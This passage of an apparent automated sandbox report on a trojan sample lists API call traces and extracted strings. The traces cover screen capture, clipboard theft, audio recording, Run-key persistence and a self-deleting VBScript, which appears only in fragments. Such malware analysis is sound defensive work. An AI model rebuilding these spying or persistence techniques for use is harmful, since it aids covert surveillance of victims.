• GetTimeZoneInformation.KERNEL32 ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
• CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
APIs
• OpenClipboard.USER32(00000000), ref: 0040B74C
• GetClipboardData.USER32(0000000D), ref: 0040B758
• CloseClipboard.USER32 ref: 0040B760
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-3916222277
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
• HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• API String ID: 1663032902-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• API String ID: 1084509184-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• API String ID: 2692324296-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• API String ID: 1084509184-0
APIs
• GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
Similarity
• API ID: NameUser
• API String ID: 2645101109-0
APIs
  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
• EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• API String ID: 1272433827-0
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• API String ID: 1084509184-0
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
Similarity
• API ID: InfoLocale
• API String ID: 2299586839-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
                                                                                                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                • Instruction Fuzzy Hash:
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
• CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
• DeleteDC.GDI32(00000000), ref: 00418F65
• DeleteDC.GDI32(00000000), ref: 00418F68
• DeleteObject.GDI32(00000000), ref: 00418F6B
• SelectObject.GDI32(00000000,00000000), ref: 00418F8C
• DeleteDC.GDI32(00000000), ref: 00418F9D
• DeleteDC.GDI32(00000000), ref: 00418FA0
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
• GetIconInfo.USER32(?,?), ref: 00418FF8
• DeleteObject.GDI32(?), ref: 00419027
• DeleteObject.GDI32(?), ref: 00419034
• DrawIcon.USER32(00000000,?,?,?), ref: 00419041
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
• GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
• LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
• GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
• DeleteDC.GDI32(?), ref: 004191B7
• DeleteDC.GDI32(00000000), ref: 004191BA
• DeleteObject.GDI32(00000000), ref: 004191BD
• GlobalFree.KERNEL32(?), ref: 004191C8
• DeleteObject.GDI32(00000000), ref: 0041927C
• GlobalFree.KERNEL32(?), ref: 00419283
• DeleteDC.GDI32(?), ref: 00419293
• DeleteDC.GDI32(00000000), ref: 0041929E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 479521175-865373369
• Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
• Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
• Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
• Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
• ExitProcess.KERNEL32 ref: 0040D80B
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-1447701601
• Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
• Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
• Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
• Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
• ExitProcess.KERNEL32 ref: 0040D454
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
• API String ID: 3797177996-2483056239
• Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
• Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
• Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
• Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
• ExitProcess.KERNEL32(00000000), ref: 004124DB
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
• CloseHandle.KERNEL32(00000000), ref: 00412576
• GetCurrentProcessId.KERNEL32 ref: 0041257C
• PathFileExistsW.SHLWAPI(?), ref: 004125AD
• GetTempPathW.KERNEL32(00000104,?), ref: 00412610
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
• lstrcatW.KERNEL32(?,.exe), ref: 0041263C
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
• Sleep.KERNEL32(000001F4), ref: 004126BD
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
• CloseHandle.KERNEL32(00000000), ref: 004126E4
• GetCurrentProcessId.KERNEL32 ref: 004126EA
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$8SG$WDH$exepath$open$temp_
• API String ID: 2649220323-436679193
• Opcode ID: 644260e79740abdb38bbef940962979a92695f68f317ec5f9d18976e4df820c3
• Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
• Opcode Fuzzy Hash: 644260e79740abdb38bbef940962979a92695f68f317ec5f9d18976e4df820c3
• Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                                APIs
                                                                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
• SetEvent.KERNEL32 ref: 0041B2AA
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
• CloseHandle.KERNEL32 ref: 0041B2CB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
• API String ID: 738084811-2094122233
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
• WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
• WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
• WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000001,00407688,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
• GetProcAddress.KERNEL32(00000000), ref: 004072C8
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
• GetProcAddress.KERNEL32(00000000), ref: 004072F4
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
• GetProcAddress.KERNEL32(00000000), ref: 0040731C
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-3588775462
APIs
• _wcslen.LIBCMT ref: 0040CE42
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
• CopyFileW.KERNEL32(C:\Users\user\Desktop\LdSbZG1iH6.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
• _wcslen.LIBCMT ref: 0040CF21
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32(C:\Users\user\Desktop\LdSbZG1iH6.exe,00000000,00000000), ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• _wcslen.LIBCMT ref: 0040D001
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Users\user\Desktop\LdSbZG1iH6.exe$del$open
• API String ID: 1579085052-2969623517
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
• LoadLibraryA.KERNEL32(?), ref: 00414EB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
• FreeLibrary.KERNEL32(00000000), ref: 00414EF0
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-3346362794
APIs
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• API String ID: 3899193279-0
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
• Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
• Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
• Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
• Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
• Sleep.KERNEL32(00000064), ref: 00412ECF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$0TG$NG$NG
• API String ID: 1223786279-2576077980
                                                                                                                                                APIs
                                                                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
